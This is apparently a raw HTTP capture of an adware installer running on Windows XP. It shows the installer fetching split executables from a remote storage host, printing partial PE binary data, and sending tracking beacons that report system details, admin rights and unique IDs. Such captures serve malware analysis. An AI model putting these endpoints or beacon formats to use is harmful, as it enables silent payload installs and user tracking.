GET /utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: closeGIF89a.............!.......,...........L..;..
GET /utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:13 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: closeGIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_b HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461993"
Last-Modified: Wed, 04 Mar 2015 09:39:53 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop001.fr7.t,1425597835.cds006.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds027.dc1.c,1425597835.cds006.fr7.pr..................S....<bS.d.,.......#.....\.9....=`...az.a.Ne.....
I.Z..%.~....Ea5..P.q..;.<..,U.Y...kjO... 3o......-(..0...ll..;[.-.
...46....o...w03....]|T:{u.....Q.Q....bz.......=...S?q....f1-:T..%.%cL
o*C4.l..!.fq..Tc....X".X..ME..!..#B7.z.`e.*{.I.~\.J.0......n..d......'
^.(......ab...=.YF.\........... ........p..g..?._.._......]}.`..j.h...
L..q.c=......5..I..r1Vt.^.g.' ...}.z.......h>..@"._z..5..<.E<
.}.R..ib.p..../T.e.B.k...%.6.5:.>..r.[F@..[...w..u..=..D....4<Z6
[email protected].).{~^.r3.....#k.J.........B{....k...K.......}.`.L~.
...Dt.E../..*J.....z......Z..n.V.....Na...x.R.m~N....=..YU..... ......
..%[email protected]>.j......p.GZ../.D.T.RY..... .R..fPx.....T.......4;..
.\I..R.wH..3oj....k...9.3L\..Z....J..c...Mj.P@'...1.. ......QV......H@
UB....A.E\...v..2..[?..w.a.e.ob..Oh...h...Q..9R.......g..<.....3.!.
O.&(....4_..........2%..p..N.E..]Z.\.O..q...0.8...G.6;.9].....s.......
F|...g.B.\2.#..h?........D.<..P9J.........P..SO"T.....t....#....v.r
.....,>5..W...W... .w...[_..{Q...h......r..9..j.*...<WVH.cZ..9&.
.........b.IS.,.2..!.QE.W?._..5..0v..1....cY.....V..X....=.`.t.....nQg
.1[...<.9:.....2a$.'.1.EZ.?.,..1..~..}........B.MN.]r.........V.j5S
...Et...H.n..v.k.J.X.j....x.A.......:.......r...}.........J=./..b..../
D........-. W%z.c.1U*4...?.y...CuV.ST.x.A...$...p..)...v.....V...JF$.;
...;AhW._"[email protected].~.Z..!V..~...I....y..........266.L.
..D<s..Z..P5}.a..rH.#..}.U.......*...;q-B.de.\4..[....r>...i.p..
...(......&..o...A.yr.9....p...1.b............FW#...o.......F.Sq..<<< skipped >>>
GET /utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: closeGIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_a HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461991"
Last-Modified: Wed, 04 Mar 2015 09:39:51 GMT
Cache-Control: max-age=2511
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop010.fr7.t,1425597835.cds002.fr7.sr,1425597835.dop010.dc1.r,1425597835.cds014.dc1.c,1425597835.cds002.fr7.prMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
................ ..............................p......................
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]...@....... [email protected]......
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..<<< skipped >>>
GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:24:06 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Thu, 05
Mar 2015 23:24:06 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /outil/fuully/styi2/setup.exe_d HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461998"
Last-Modified: Wed, 04 Mar 2015 09:39:58 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop008.fr7.t,1425597835.cds027.fr7.sr,1425597835.dop004.dc1.r,1425597835.cds018.dc1.c,1425597835.cds027.fr7.pr.b....:-.\....K........J..n<.....U5r.96_.Gd..~.q...ki..z_<......
...LzcF.....q4..c.#.0E..\.O...p:LM...".0H.....6![:%..r..Z.{(.....x....
.a..Mo.s.BW...3.E>..=c.*.n=.....%.s.V......t7y.|....FF....9z......{
z...:3.. ;Z.G..a.Q..Oe..........G.e..m...v.:^.M30..-.....c.>jo,TR.^
.....m.Vb....%.z.........Dp.DE.............U....q..&.......D..o$.EC.#E
....*.. ..N.u.K.5.z..\.".I._.....up..:9..Y..B0.i...9kF.q...pc....\(v.,
.r...^z.7(.o..D..}...I..mT..X.R.s.....f...:..*R2bk..T0r0.....,....O...
...x.F....i.Q....,..9:;o.&...s...'Z...X..3.}.K..Ox!~..VQ...*.....@....
4.#}[...J...J...*........N.4.\A..~_.b...A......V..`..6xdH....B..A..].
..VY....4Y,...~.,...A.....f..R....<N..G.OxJF...e....Y...]W...|.1...
...<....]......J....v...^>X,...}v..rN;...i..0........>..]....
...:3...E.. .....[....?.!a.3.$.C.b..N...7.........L.k/m.....kw'...No"j
D..y...0..d.@..>.iM&.W...A.Y....B.......^..U .jw....J...-M.......(.
.|....m..|-.....8.p. .{.g..i(.....~R.].:.Bl.bW.\GK1zY..3A..O....jc.I:.
..5....5........1.....Q>na..lGRDy..<.29.(....5Y...<.~.f.z....
."..a...&.{....B.....B....u.6...B.[..$.1...v...8}n.....:..*A..x......Z
y.........M"k......L=|..E....].....&k{..k.S..~...R3.w..I.....3...Y./..
s.E..>.......... ."...f..v.W..P.........GyLvwM5._..,B.BV.\.{C(....h
.c..........."..9....8.;..^.L.S...8c.d.AN..S.|$..%>Z]..5.TS}.A.F...
s.O......>....)......}2.M<#m........J.m...).X.Yl."M.U..2p... )LT
.F........&6%. .K..H.q.c.....ww...$...?|..74 FP$........{..-.........E
.i...CYh.h...Z..UK.....[............D...kV]...gS...&R4..m..&.U..w4<<< skipped >>>
GET /utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 9Tcz6Ap2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy
x-amz-request-id: A16DE0E2CD020B49
Date: Thu, 05 Mar 2015 23:24:05 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9Tcz6A
p2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy..x-amz-requ
est-id: A16DE0E2CD020B49..Date: Thu, 05 Mar 2015 23:24:05 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....
GET /installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: hRdx8sPtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M
x-amz-request-id: 28EEC20B1021BA7F
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: hRdx8s
PtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M..x-amz-requ
est-id: 28EEC20B1021BA7F..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: dHcCGtITcro3krS3zzCUBB/PyBJcOmeanAIOwt1zjHpRd EhrSMar7sNev tM0Zs
x-amz-request-id: 217FED2A048E8812
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x
x-amz-request-id: D9B49812856D47D8
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: aiz9xg
vD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x..x-amz-requ
est-id: D9B49812856D47D8..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF
x-amz-request-id: 0326DD6CDACB1E14
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: YfZq4a
AKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF..x-amz-requ
est-id: 0326DD6CDACB1E14..Date: Thu, 05 Mar 2015 23:24:10 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: pA/BMrf6nnbcsXt9aUrjBMJXCjMg/rYN0bREwFw2IFJjiNAFiGowVVRm08n4cTXj
x-amz-request-id: 782D1254A2753524
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tu J10nP 3UiJjMiersLzKMfUM//adluDe3txSAwe0xiPcLPCBY5gbiIfcRIhUyJ
x-amz-request-id: 856775D186715B3E
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: c7R66s0PbI6RE2OyTOiCC/kkDREmnq8XI9Rrb31NiEInzxWmSTj6svYElmM6GGW3
x-amz-request-id: EEA240B973A1ED0B
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: jf4p2TpI1QvS4utE gh41cCrCUXngSXk9kIDTep6JbEcK98dPVUaxRXECXnpLHcC
x-amz-request-id: FBE2853165EBC225
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vncs5DFxlxNe5vB3cTxcHPuo4uYeUPMRYUmU2TsEieD4MwiL4d6lbiXiNTtRveSD
x-amz-request-id: 324E8B4267AD49B1
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: T31DEGAF6h4dLzhlC422YM7O0Gl5KZ7sCd1d6z6yoij0mBcnDMp3bJk9sLrV/JT3
x-amz-request-id: BF691D9E6E248501
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ttgnYaHLNdphi3cl2cTDyuw3wDrD9mFYxXExz2wOsce4Qf2LLcxOb9L72gQsFkhv
x-amz-request-id: C667B0063F2F2E11
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i
x-amz-request-id: 535D90B37079E09D
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: l/Xfen
bIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i..x-amz-requ
est-id: 535D90B37079E09D..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: GjC3mnbWhImS6Wr09zk2cotmx45tUhke1isOX 7XHJNlTycAlHMdwhOd7bFM4b6K
x-amz-request-id: ED30DA0F391DC5A2
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK
x-amz-request-id: 8EA97A25493FB8FC
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Bg1LKY
B9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK..x-amz-requ
est-id: 8EA97A25493FB8FC..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..
GET /installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB
x-amz-request-id: C7467C452F157333
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: CI/xqr
h7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB..x-amz-requ
est-id: C7467C452F157333..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....
GET /installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vgIRq9xlWi7A2OtBmXsJCbotmSTVr5MK1z v0sz8o3fTTfSeKrYM1GfS4qpBlv w
x-amz-request-id: 3CBC5AFF8D68D5F6
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: u8LTwYQJKffKricroarszKXJRYq9a3kbqfiiuvLg3 TDit7DU3UnBq7Kkmq7saVP
x-amz-request-id: 338D1C02DC56E30B
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:09 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3GIF89a.............,...........D..;..
GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:55 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: closeGIF89a.............!.......,...........L..;..
